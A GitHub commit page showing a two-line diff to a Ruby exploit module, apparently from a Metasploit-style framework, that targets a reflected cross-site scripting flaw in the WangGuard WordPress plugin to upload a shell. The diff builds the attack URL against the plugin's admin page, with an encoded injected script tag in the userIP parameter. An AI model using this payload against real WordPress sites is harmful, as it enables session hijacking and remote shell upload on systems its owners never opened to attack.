Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit f9292b9

Browse files
phyushinphyushin
committed
Move query string into url_with_xss function
1 parent a678f11 commit f9292b9

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/wang_guard_reflected_xss_shell_upload.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -22,10 +22,10 @@ def check
2222
end
2323

2424
def vulnerable_url
25-
normalize_uri(wordpress_url_admin, 'admin.php?page=wangguard_users_info&userIP=')
25+
normalize_uri(wordpress_url_admin, 'admin.php')
2626
end
2727

2828
def url_with_xss
29-
"#{vulnerable_url}%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C"
29+
"#{vulnerable_url}?page=wangguard_users_info&userIP=%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C"
3030
end
3131
end

0 commit comments

Comments
 (0)